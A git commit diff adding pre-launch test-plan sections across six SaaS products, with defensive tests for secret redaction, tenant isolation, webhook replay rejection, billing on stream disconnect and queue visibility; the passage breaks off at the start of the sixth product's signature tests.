Implement BMad Must-Have Before Launch fixes for all 6 products

P1: API key redaction, SSE billing leak, token math edge cases, CI runner config
P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility
P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier
P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency
P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback
P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
This commit is contained in:
2026-03-01 02:14:04 +00:00
parent b24cfa7c0d
commit d038cd9c5c
6 changed files with 1305 additions and 0 deletions

View File

@@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() {
```
*End of P1 Review Remediation Addendum*
---
## 12. BMad Review Implementation (Must-Have Before Launch)
### 12.1 API Key Redaction in Panic Traces
```rust
// tests/security/key_redaction_test.rs
#[test]
fn panic_handler_redacts_bearer_tokens_from_stack_trace() {
// Simulate a panic inside the proxy handler while processing a request
// with Authorization: Bearer sk-live-abc123
let result = std::panic::catch_unwind(|| {
process_request_with_panic("Bearer sk-live-abc123");
});
assert!(result.is_err());
// Capture the panic message
let panic_msg = get_last_panic_message();
assert!(!panic_msg.contains("sk-live-abc123"),
"Panic trace contains raw API key!");
assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-"));
}
#[test]
fn error_log_redacts_provider_api_keys() {
// Simulate an upstream error that includes the provider key in the response
let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#;
let sanitized = redact_sensitive_fields(error_body);
assert!(!sanitized.contains("sk-proj-abc123xyz"));
}
#[test]
fn telemetry_event_never_contains_raw_api_key() {
let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50);
let serialized = serde_json::to_string(&event).unwrap();
assert!(!serialized.contains("sk-live-secret"));
assert!(!serialized.contains("Bearer"));
}
```
### 12.2 SSE Billing Leak Prevention (Expanded)
```rust
#[tokio::test]
async fn sse_disconnect_bills_only_streamed_tokens() {
let stack = E2EStack::start().await;
let mock = stack.mock_provider();
// Provider will stream 100 tokens at 1/sec
mock.configure_slow_stream(100, Duration::from_millis(100));
// Client reads 10 tokens then disconnects
let mut stream = stack.proxy_stream(&chat_request_streaming()).await;
let mut received = 0;
while let Some(chunk) = stream.next().await {
received += count_tokens_in_chunk(&chunk);
if received >= 10 { break; }
}
drop(stream);
tokio::time::sleep(Duration::from_millis(500)).await;
// Billing must reflect only streamed tokens
let usage = stack.get_last_usage_record().await;
assert!(usage.completion_tokens <= 15, // small buffer for in-flight
"Billed {} tokens but only streamed ~10", usage.completion_tokens);
// Provider connection must be aborted
assert_eq!(mock.active_connections(), 0);
}
#[tokio::test]
async fn sse_disconnect_during_prompt_processing_bills_zero_completion() {
// Client disconnects before any completion tokens are generated
// (provider is still processing the prompt)
let stack = E2EStack::start().await;
let mock = stack.mock_provider();
mock.configure_delay_before_first_token(Duration::from_secs(5));
let stream = stack.proxy_stream(&chat_request_streaming()).await;
tokio::time::sleep(Duration::from_millis(100)).await;
drop(stream); // Disconnect before first token
let usage = stack.get_last_usage_record().await;
assert_eq!(usage.completion_tokens, 0);
// Prompt tokens may still be billed (provider processed them)
}
```
### 12.3 Token Calculation Edge Cases
```rust
#[test]
fn tokenizer_handles_unicode_emoji_correctly() {
// cl100k_base tokenizes emoji differently than ASCII
let text = "Hello 🌍🔥 world";
let tokens = count_tokens_cl100k(text);
assert!(tokens > 3); // Emoji take multiple tokens
}
#[test]
fn tokenizer_handles_cjk_characters() {
let text = "你好世界";
let tokens = count_tokens_cl100k(text);
assert!(tokens >= 4); // Each CJK char is typically 1+ tokens
}
#[test]
fn cost_calculation_matches_provider_billing() {
    // Property test: our token count * rate must match what the provider reports
    // within a 1% tolerance (tokenizer version differences).
    fc::assert(fc::property(
        fc::string_of(fc::any::<char>(), 1..1000),
        |text| {
            let our_count = count_tokens_cl100k(&text);
            let provider_count = mock_provider_token_count(&text);
            // Guard the division: if the provider tokenizes the input to zero
            // tokens, `diff / 0.0` is NaN/inf and the property silently fails.
            // In that case we require our count to agree exactly.
            if provider_count == 0 {
                return our_count == 0;
            }
            let diff = (our_count as f64 - provider_count as f64).abs();
            diff / provider_count as f64 <= 0.01
        }
    ));
}
#[test]
fn anthropic_tokenizer_differs_from_openai() {
// Same text, different token counts — billing must use the correct tokenizer
let text = "The quick brown fox jumps over the lazy dog";
let openai_tokens = count_tokens_cl100k(text);
let anthropic_tokens = count_tokens_claude(text);
// They WILL differ — verify we use the right one per provider
assert_ne!(openai_tokens, anthropic_tokens);
}
```
### 12.4 Dedicated CI Runner for Latency Benchmarks
```yaml
# .github/workflows/benchmark.yml
# Runs on self-hosted runner (Brian's NAS) — not shared GitHub Actions
name: Latency Benchmark
on:
  push:
    branches: [main]
    paths: ['src/proxy/**']
jobs:
  benchmark:
    runs-on: self-hosted  # Brian's NAS with consistent CPU
    steps:
      - uses: actions/checkout@v4
      - name: Run proxy latency benchmark
        run: cargo bench --bench proxy_latency
      # NOTE: criterion's estimates.json exposes mean/median point estimates
      # (nanoseconds), NOT a P99. Gate on the median; a true P99 gate would
      # need to parse the raw samples under target/criterion/**/sample.json.
      - name: Assert median < 5ms
        run: |
          MEDIAN_NS=$(jq '.median.point_estimate' target/criterion/proxy_overhead/new/estimates.json)
          if (( $(echo "$MEDIAN_NS > 5000000" | bc -l) )); then
            echo "Median latency ${MEDIAN_NS}ns exceeds 5ms budget"
            exit 1
          fi
```
*End of P1 BMad Implementation*

View File

@@ -2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push
| E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests |
*End of P2 Review Remediation Addendum*
---
## 12. BMad Review Implementation (Must-Have Before Launch)
### 12.1 mTLS Revocation — Instant Lockout
```go
// tests/integration/mtls_revocation_test.go
func TestRevokedCert_ExistingConnectionDropped(t *testing.T) {
// 1. Agent connects with valid cert
agent := connectAgentWithCert(t, validCert)
assert.True(t, agent.IsConnected())
// 2. Revoke the cert via CRL update
revokeCert(t, validCert.SerialNumber)
// 3. Force CRL refresh on SaaS (< 30 seconds)
triggerCRLRefresh(t)
// 4. Existing connection must be terminated
time.Sleep(5 * time.Second)
assert.False(t, agent.IsConnected(),
"Revoked agent still has active mTLS connection — cached session not cleared")
}
func TestRevokedCert_NewConnectionRejected(t *testing.T) {
revokeCert(t, validCert.SerialNumber)
triggerCRLRefresh(t)
_, err := connectAgentWithCert(t, validCert)
assert.Error(t, err)
assert.Contains(t, err.Error(), "certificate revoked")
}
func TestPayloadReplay_RejectedByNonce(t *testing.T) {
// Capture a legitimate drift report
report := captureValidDriftReport(t)
// Replay it
resp := postDriftReport(t, report)
assert.Equal(t, 409, resp.StatusCode) // Conflict — nonce already used
}
```
### 12.2 Terraform State Lock Recovery on Panic
```go
// tests/integration/remediation_panic_test.go
func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) {
// 1. Start a remediation (terraform apply)
execID := startRemediation(t, "stack-1", "drift-1")
waitForState(t, execID, "applying")
// 2. Verify state lock is held
lockInfo := getTerraformStateLock(t, "stack-1")
assert.NotNil(t, lockInfo, "State lock should be held during apply")
// 3. Trigger panic mode
triggerPanicMode(t)
// 4. Wait for agent to abort
waitForState(t, execID, "aborted")
// 5. State lock MUST be released
lockInfo = getTerraformStateLock(t, "stack-1")
assert.Nil(t, lockInfo,
"Terraform state lock not released after panic — infrastructure is now in zombie state")
}
func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) {
	// If normal unlock fails, agent must run `terraform force-unlock`.
	// Fix: the original discarded the return of startRemediation but then
	// referenced an undeclared execID — this did not compile.
	execID := startRemediation(t, "stack-1", "drift-1")
	waitForState(t, execID, "applying")
	// Simulate a lock that can't be released normally
	corruptStateLock(t, "stack-1")
	triggerPanicMode(t)
	// Agent should attempt force-unlock
	logs := getAgentLogs(t)
	assert.Contains(t, logs, "terraform force-unlock")
}
```
### 12.3 RLS Connection Pool Leak Test
```go
// tests/integration/rls_pool_leak_test.go
func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) {
t.Parallel()
// 1. Request as Tenant A — sets SET LOCAL app.tenant_id = 'tenant-a'
respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks")
assert.Equal(t, 200, respA.StatusCode)
stacksA := parseStacks(respA)
// 2. Immediately request as Tenant B on same PgBouncer connection
respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks")
assert.Equal(t, 200, respB.StatusCode)
stacksB := parseStacks(respB)
// 3. Tenant B must NOT see Tenant A's stacks
for _, stack := range stacksB {
assert.NotEqual(t, "tenant-a", stack.TenantID,
"CRITICAL: Tenant B received Tenant A's data — PgBouncer leaked context")
}
}
func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) {
	// Stress test: 100 concurrent requests from different tenants.
	// Violations are collected under a mutex rather than a fixed-size
	// channel: a single leaking tenant can report many rows, and once a
	// 100-slot channel fills, senders block and wg.Wait() deadlocks.
	var (
		wg         sync.WaitGroup
		mu         sync.Mutex
		violations []string
	)
	for i := 0; i < 100; i++ {
		wg.Add(1)
		go func(tenantID string) {
			defer wg.Done()
			token := createTenantToken(t, tenantID)
			resp := apiRequest(t, token, "GET", "/v1/stacks")
			stacks := parseStacks(resp)
			for _, s := range stacks {
				if s.TenantID != tenantID {
					mu.Lock()
					violations = append(violations, fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID))
					mu.Unlock()
				}
			}
		}(fmt.Sprintf("tenant-%d", i))
	}
	wg.Wait()
	for _, v := range violations {
		t.Fatal("CROSS-TENANT LEAK:", v)
	}
}
```
### 12.4 Secret Scrubber Entropy Scanning
```go
// pkg/agent/scrubber/entropy_test.go
func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) {
// AWS key base64-encoded inside a JSON block
input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}`
result := scrubber.Scrub(input)
assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE")
}
func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) {
input := `-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa...
-----END RSA PRIVATE KEY-----`
result := scrubber.Scrub(input)
assert.Contains(t, result, "[REDACTED RSA KEY]")
}
func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) {
// 40-char hex string that looks like a custom API token
token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"
input := fmt.Sprintf(`{"api_token": "%s"}`, token)
result := scrubber.Scrub(input)
// Shannon entropy > 3.5 bits/char should trigger redaction
assert.NotContains(t, result, token)
}
func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) {
input := `{"message": "Hello world, this is a normal log message"}`
result := scrubber.Scrub(input)
assert.Equal(t, input, result) // No false positives
}
```
### 12.5 pgmq Visibility Timeout for Long Scans
```go
// tests/integration/pgmq_visibility_test.go
func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) {
// Simulate a scan that takes 5 minutes
queue := setupPgmqQueue(t)
// Enqueue a drift report
queue.Send(t, makeDriftReport("stack-1"))
// Consumer 1 picks it up with 2-minute visibility timeout
msg := queue.Read(t, 120) // 120s visibility
assert.NotNil(t, msg)
// Simulate long processing (extend visibility)
for i := 0; i < 3; i++ {
time.Sleep(90 * time.Second)
queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min
}
// Consumer 2 should NOT get the same message
msg2 := queue.Read(t, 120)
assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing")
}
```
*End of P2 BMad Implementation*

View File

@@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => {
| E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow |
*End of P3 Review Remediation Addendum*
---
## 12. BMad Review Implementation (Must-Have Before Launch)
### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention)
```typescript
describe('HMAC Replay Attack Prevention', () => {
it('rejects Datadog webhook with timestamp older than 5 minutes', async () => {
const payload = makeDatadogPayload();
const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s
const sig = computeDatadogHMAC(payload, staleTimestamp);
const resp = await ingest(payload, {
'dd-webhook-timestamp': staleTimestamp.toString(),
'dd-webhook-signature': sig,
});
expect(resp.status).toBe(401);
expect(resp.body.error).toContain('stale timestamp');
});
it('rejects PagerDuty webhook with missing timestamp', async () => {
const payload = makePagerDutyPayload();
const sig = computePagerDutyHMAC(payload);
const resp = await ingest(payload, {
'x-pagerduty-signature': sig,
// No timestamp header
});
expect(resp.status).toBe(401);
});
it('rejects OpsGenie webhook replayed after 5 minutes', async () => {
// OpsGenie doesn't always package timestamp cleanly
// Must extract from payload body and validate
const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() });
const sig = computeOpsGenieHMAC(payload);
const resp = await ingest(payload, { 'x-opsgenie-signature': sig });
expect(resp.status).toBe(401);
});
it('accepts fresh webhook within 5-minute window', async () => {
const payload = makeDatadogPayload();
const freshTimestamp = Math.floor(Date.now() / 1000);
const sig = computeDatadogHMAC(payload, freshTimestamp);
const resp = await ingest(payload, {
'dd-webhook-timestamp': freshTimestamp.toString(),
'dd-webhook-signature': sig,
});
expect(resp.status).toBe(200);
});
});
```
### 12.2 Cross-Tenant Negative Isolation Tests
```typescript
describe('DynamoDB Tenant Isolation (Negative Tests)', () => {
it('Tenant A cannot read Tenant B incidents', async () => {
// Seed data for both tenants
await createIncident('tenant-a', { title: 'A incident' });
await createIncident('tenant-b', { title: 'B incident' });
// Query as Tenant A
const results = await dao.listIncidents('tenant-a');
// Explicitly assert Tenant B data is absent
const tenantIds = results.map(r => r.tenantId);
expect(tenantIds).not.toContain('tenant-b');
expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true);
});
it('Tenant A cannot read Tenant B analytics', async () => {
await seedAnalytics('tenant-a', { alertCount: 100 });
await seedAnalytics('tenant-b', { alertCount: 200 });
const analytics = await dao.getAnalytics('tenant-a');
expect(analytics.alertCount).toBe(100); // Not 300 (combined)
});
it('API returns 404 (not 403) for cross-tenant incident access', async () => {
const incident = await createIncident('tenant-b', { title: 'secret' });
const resp = await api.get(`/v1/incidents/${incident.id}`)
.set('Authorization', `Bearer ${tenantAToken}`);
// 404 not 403 — don't leak existence
expect(resp.status).toBe(404);
});
});
```
### 12.3 Correlation Window Edge Cases
```typescript
describe('Out-of-Order Alert Delivery', () => {
it('late alert attaches to existing incident (not duplicate)', async () => {
const clock = new FakeClock();
const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
// Alert 1 arrives at T=0
const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 });
const incident1 = await engine.process(alert1);
// Window closes at T=5min, incident shipped
clock.advanceBy(5 * 60 * 1000);
await engine.flushWindows();
// Late alert arrives at T=6min with timestamp T=2min (within original window)
const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 });
const result = await engine.process(lateAlert);
// Must attach to existing incident, not create new one
expect(result.incidentId).toBe(incident1.incidentId);
expect(result.action).toBe('attached_to_existing');
});
it('very late alert (>2x window) creates new incident', async () => {
const clock = new FakeClock();
const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
const incident1 = await engine.process(alert1);
// 15 minutes later (3x the 5-min window)
clock.advanceBy(15 * 60 * 1000);
const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
const result = await engine.process(lateAlert);
expect(result.incidentId).not.toBe(incident1.incidentId);
expect(result.action).toBe('new_incident');
});
});
```
### 12.4 SQS Claim-Check Round-Trip
```typescript
describe('SQS 256KB Claim-Check End-to-End', () => {
it('large payload round-trips through S3 pointer', async () => {
const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB
// Ingestion compresses and stores in S3
const resp = await ingest(largePayload);
expect(resp.status).toBe(200);
// SQS message contains S3 pointer
const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue');
const body = JSON.parse(sqsMsg.Body);
expect(body.s3Pointer).toBeDefined();
// Correlation engine fetches from S3 and processes
const incident = await waitForIncidentCreated(5000);
expect(incident).toBeDefined();
expect(incident.sourceAlertCount).toBeGreaterThan(0);
});
it('S3 fetch timeout does not crash correlation engine', async () => {
// Inject S3 latency (10 second delay)
mockS3.setLatency(10000);
const largePayload = makeLargeAlertPayload(300 * 1024);
await ingest(largePayload);
// Correlation engine should timeout and send to DLQ
const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000);
expect(dlqMsg).toBeDefined();
// Engine is still healthy
const health = await api.get('/health');
expect(health.status).toBe(200);
});
});
```
### 12.5 Free Tier Enforcement
```typescript
describe('Free Tier (10K alerts/month, 7-day retention)', () => {
  it('accepts alert at 9,999 count', async () => {
    await setAlertCounter('tenant-free', 9999);
    // Fix: was `ingestAsTenat` (typo) — an undefined identifier, so this
    // boundary case threw instead of exercising the limit.
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(200);
  });
  it('rejects alert at 10,001 with upgrade prompt', async () => {
    await setAlertCounter('tenant-free', 10000);
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(429);
    expect(resp.body.upgrade_url).toContain('stripe');
  });
  it('counter resets on first of month', async () => {
    await setAlertCounter('tenant-free', 10000);
    clock.advanceToFirstOfNextMonth();
    await runMonthlyReset();
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(200);
  });
  it('purges data older than 7 days on free tier', async () => {
    await createIncident('tenant-free', { createdAt: eightDaysAgo() });
    await runRetentionPurge();
    const incidents = await dao.listIncidents('tenant-free');
    expect(incidents).toHaveLength(0);
  });
  it('retains data for 90 days on pro tier', async () => {
    await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() });
    await runRetentionPurge();
    const incidents = await dao.listIncidents('tenant-pro');
    expect(incidents).toHaveLength(1);
  });
});
```
*End of P3 BMad Implementation*

View File

@@ -1265,3 +1265,225 @@ def test_meilisearch_index_rebuild_does_not_drop_search():
    # Verify zero-downtime index swapping during mapping updates
    pass
```
---
## 12. BMad Review Implementation (Must-Have Before Launch)
### 12.1 Discovery Scan Timeout / Partial Failure Recovery
```python
# tests/integration/test_discovery_resilience.py
def test_partial_aws_scan_does_not_delete_existing_services():
"""If AWS scanner times out after discovering 500 of 1000 resources,
existing catalog entries must NOT be marked stale or deleted."""
# Seed catalog with 1000 services
seed_catalog(count=1000)
# Simulate scanner timeout after 500 resources
with mock_aws_timeout_after(500):
result = run_aws_discovery_scan()
assert result.status == "partial_failure"
assert result.discovered == 500
# All 1000 services must still exist in catalog
services = catalog_api.list_services()
assert len(services) == 1000 # NOT 500
# Partial results should be staged, not committed
staged = catalog_api.list_staged_updates()
assert len(staged) == 500
def test_partial_github_scan_does_not_corrupt_ownership():
"""If GitHub scanner hits rate limit mid-scan, existing ownership
mappings must be preserved."""
seed_catalog_with_ownership(count=100)
with mock_github_rate_limit_after(50):
result = run_github_discovery_scan()
assert result.status == "partial_failure"
# All 100 ownership mappings intact
services = catalog_api.list_services()
owned = [s for s in services if s.owner is not None]
assert len(owned) == 100 # NOT 50
def test_scan_failure_triggers_alert_not_silent_failure():
result = run_aws_discovery_scan_with_invalid_credentials()
assert result.status == "failed"
# Must alert the admin
alerts = get_admin_alerts()
assert any("discovery scan failed" in a.message for a in alerts)
```
### 12.2 Ownership Conflict Resolution Integration Test
```python
# tests/integration/test_ownership_conflict.py
def test_explicit_config_overrides_implicit_tag():
"""Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)"""
# AWS tag says owner is "team-infra"
aws_scanner.discover_service("auth-api", owner_tag="team-infra")
# GitHub CODEOWNERS says owner is "team-platform"
github_scanner.discover_service("auth-api", codeowners="team-platform")
# Resolve conflict
service = catalog_api.get_service("auth-api")
assert service.owner == "team-platform" # Explicit wins
assert service.owner_source == "codeowners"
def test_concurrent_discovery_sources_do_not_race():
"""Two scanners discovering the same service simultaneously
must not create duplicate entries."""
import asyncio
async def run_both():
await asyncio.gather(
aws_scanner.discover_service_async("billing-api"),
github_scanner.discover_service_async("billing-api"),
)
asyncio.run(run_both())
services = catalog_api.search("billing-api")
assert len(services) == 1 # No duplicates
def test_heuristic_ownership_does_not_override_explicit():
# Explicit owner set via config
catalog_api.set_owner("auth-api", "team-platform", source="config")
# Heuristic scanner infers different owner from commit history
github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com")
service = catalog_api.get_service("auth-api")
assert service.owner == "team-platform" # Explicit preserved
```
### 12.3 VCR Cassette Freshness Validation
```yaml
# .github/workflows/vcr-refresh.yml
# Weekly job to re-record VCR cassettes against real AWS
name: VCR Cassette Freshness
on:
schedule:
- cron: '0 6 * * 1' # Every Monday 6 AM UTC
jobs:
refresh:
runs-on: self-hosted
steps:
- uses: actions/checkout@v4
- name: Re-record cassettes
env:
AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }}
AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }}
run: |
VCR_RECORD=all pytest tests/integration/scanners/ -v
- name: Diff cassettes
run: |
git diff --stat tests/cassettes/
CHANGED=$(git diff --name-only tests/cassettes/ | wc -l)
if [ "$CHANGED" -gt 0 ]; then
echo "⚠️ $CHANGED cassettes changed — AWS API responses have drifted"
echo "Review and commit updated cassettes"
fi
- name: Create PR if cassettes changed
uses: peter-evans/create-pull-request@v6
with:
title: "chore: refresh VCR cassettes (AWS API drift)"
branch: vcr-refresh
```
### 12.4 Meilisearch Zero-Downtime Index Rebuild
```python
# tests/integration/test_meilisearch_rebuild.py
def test_search_returns_results_during_index_rebuild():
"""Cmd+K search must work during index rebuild (zero downtime)."""
# Seed index with 100 services
meili.index("services").add_documents(make_services(100))
meili.index("services").wait_for_pending_update()
# Start rebuild (creates services_v2, swaps when ready)
rebuild_task = start_index_rebuild()
# Search must still work during rebuild
results = meili.index("services").search("auth")
assert len(results["hits"]) > 0
# Wait for rebuild to complete
rebuild_task.wait()
# Search still works after swap
results = meili.index("services").search("auth")
assert len(results["hits"]) > 0
def test_index_rebuild_failure_does_not_corrupt_active_index():
meili.index("services").add_documents(make_services(50))
# Simulate rebuild failure (e.g., OOM during indexing)
with mock_meili_oom_during_rebuild():
result = start_index_rebuild()
assert result.status == "failed"
# Active index must be untouched
results = meili.index("services").search("billing")
assert len(results["hits"]) > 0 # Still works
```
### 12.5 Cmd+K Search Latency from Redis Cache
```python
# tests/performance/test_search_latency.py
def test_cmd_k_search_under_10ms_from_redis():
"""Prefix cache hit must return in <10ms."""
# Warm the cache
redis_client.set("search:prefix:auth", json.dumps([
{"name": "auth-service", "owner": "team-platform"},
{"name": "auth-proxy", "owner": "team-infra"},
]))
import time
start = time.perf_counter_ns()
results = search_api.prefix_search("auth")
elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000
assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms — exceeds 10ms SLA"
assert len(results) == 2
```
### 12.6 Free Tier Enforcement (50 Services)
```python
def test_free_tier_allows_50_services():
tenant = create_tenant(tier="free")
for i in range(50):
resp = catalog_api.create_service(tenant, f"service-{i}")
assert resp.status_code == 201
def test_free_tier_rejects_51st_service():
tenant = create_tenant(tier="free")
seed_services(tenant, count=50)
resp = catalog_api.create_service(tenant, "service-51")
assert resp.status_code == 403
assert "upgrade" in resp.json()["error"].lower()
```
*End of P4 BMad Implementation*

View File

@@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({
- CDK definitions, LocalStack event injection, wire everything together.
*End of dd0c/cost Test Architecture (v2)*
---
## 12. BMad Review Implementation (Must-Have Before Launch)
### 12.1 Concurrent Baseline Update Conflict Test
```typescript
describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => {
it('two simultaneous Lambda invocations converge to correct baseline', async () => {
// Seed baseline: mean=1.00, stddev=0.10, count=20
await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 });
// Two events arrive simultaneously for the same resource type
const event1 = makeCostEvent({ hourlyCost: 1.50 });
const event2 = makeCostEvent({ hourlyCost: 2.00 });
// Process concurrently
const [result1, result2] = await Promise.allSettled([
processEvent('tenant-1', 'ec2/m5.xlarge', event1),
processEvent('tenant-1', 'ec2/m5.xlarge', event2),
]);
// One succeeds, one retries via ConditionalCheckFailed
const successes = [result1, result2].filter(r => r.status === 'fulfilled');
expect(successes.length).toBe(2); // Both eventually succeed
// Final baseline must reflect BOTH events
const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge');
expect(baseline.count).toBe(22); // 20 + 2
// Mean should be updated by both observations (order doesn't matter for Welford)
});
it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => {
const spy = vi.spyOn(dynamoClient, 'transactWriteItems');
// Force a conflict on first attempt
mockConflictOnce();
await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 }));
// Should have been called twice (initial + retry)
expect(spy).toHaveBeenCalledTimes(2);
});
});
```
### 12.2 Remediation RBAC
```typescript
describe('Remediation Authorization', () => {
it('only account owners can click Stop Instance', async () => {
const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' });
const resp = await handleSlackAction(ownerAction);
expect(resp.status).toBe(200);
});
it('viewer role cannot trigger remediation', async () => {
const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' });
const resp = await handleSlackAction(viewerAction);
expect(resp.status).toBe(403);
expect(resp.body.error).toContain('insufficient permissions');
});
it('user from different Slack workspace cannot trigger remediation', async () => {
const foreignAction = makeSlackAction('stop_instance', {
userId: 'U_FOREIGN',
teamId: 'T_OTHER_WORKSPACE'
});
const resp = await handleSlackAction(foreignAction);
expect(resp.status).toBe(403);
});
it('snooze and mark-expected are allowed for all authenticated users', async () => {
const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' });
const resp = await handleSlackAction(viewerSnooze);
expect(resp.status).toBe(200);
});
});
```
### 12.3 Clock Interface for Governance Tests
```typescript
// src/governance/clock.ts
interface Clock {
now(): number;
advanceBy(ms: number): void;
}
class FakeClock implements Clock {
private current: number;
constructor(start = Date.now()) { this.current = start; }
now() { return this.current; }
advanceBy(ms: number) { this.current += ms; }
}
describe('14-Day Auto-Promotion (Clock-Injected)', () => {
let clock: FakeClock;
let governance: GovernanceEngine;
beforeEach(() => {
clock = new FakeClock(new Date('2026-03-01').getTime());
governance = new GovernanceEngine(clock);
});
it('does not promote at day 13', () => {
clock.advanceBy(13 * 24 * 60 * 60 * 1000);
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
expect(result.promoted).toBe(false);
});
it('promotes at day 15 with low FP rate', () => {
clock.advanceBy(15 * 24 * 60 * 60 * 1000);
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
expect(result.promoted).toBe(true);
expect(result.newMode).toBe('audit');
});
it('does not promote at day 15 with high FP rate', () => {
clock.advanceBy(15 * 24 * 60 * 60 * 1000);
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 });
expect(result.promoted).toBe(false);
expect(result.reason).toContain('false-positive rate');
});
});
```
### 12.4 Property-Based Tests with 10K Runs
```typescript
describe('Anomaly Scorer (fast-check, 10K runs)', () => {
it('score is always between 0 and 100', () => {
fc.assert(
fc.property(
fc.record({
cost: fc.float({ min: 0, max: 10000, noNaN: true }),
mean: fc.float({ min: 0, max: 10000, noNaN: true }),
stddev: fc.float({ min: 0, max: 1000, noNaN: true }),
}),
(input) => {
const score = scorer.score(input);
return score >= 0 && score <= 100;
}
),
{ numRuns: 10000, seed: 42 } // Reproducible
);
});
it('score monotonically increases as cost increases', () => {
fc.assert(
fc.property(
fc.float({ min: 0, max: 100, noNaN: true }),
fc.float({ min: 0, max: 100, noNaN: true }),
fc.float({ min: 0.01, max: 50, noNaN: true }),
(costA, costB, stddev) => {
const baseline = { mean: 5.0, stddev };
const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline });
const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline });
return scoreB >= scoreA;
}
),
{ numRuns: 10000, seed: 42 }
);
});
});
```
### 12.5 Redis Failure During Panic Mode Check
```typescript
describe('Panic Mode Redis Failure', () => {
  it('defaults to panic=active (safe) when Redis is unreachable', async () => {
    // Sever the Redis connection before the check runs.
    await redis.disconnect();
    // Fail-safe semantics: an unreachable store must be treated as panic ON,
    // never as panic OFF.
    expect(await governance.checkPanicMode('tenant-1')).toBe(true);
  });

  it('logs warning when Redis is unreachable for panic check', async () => {
    await redis.disconnect();
    // Observe the logger before invoking the check.
    const logSpy = vi.spyOn(logger, 'warn');
    await governance.checkPanicMode('tenant-1');
    expect(logSpy).toHaveBeenCalledWith(
      expect.stringContaining('Redis unreachable — defaulting to panic=active')
    );
  });
});
```
*End of P5 BMad Implementation*

View File

@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda
| Dashboard API | 40% | 50% | 10% |
*End of Review Remediation Addendum*
---
## 12. BMad Review Implementation (Must-Have Before Launch)
### 12.1 Cryptographic Signatures for Agent Updates
```rust
// pkg/agent/update/signature_test.rs
/// A binary signed with the wrong key must be rejected outright.
#[test]
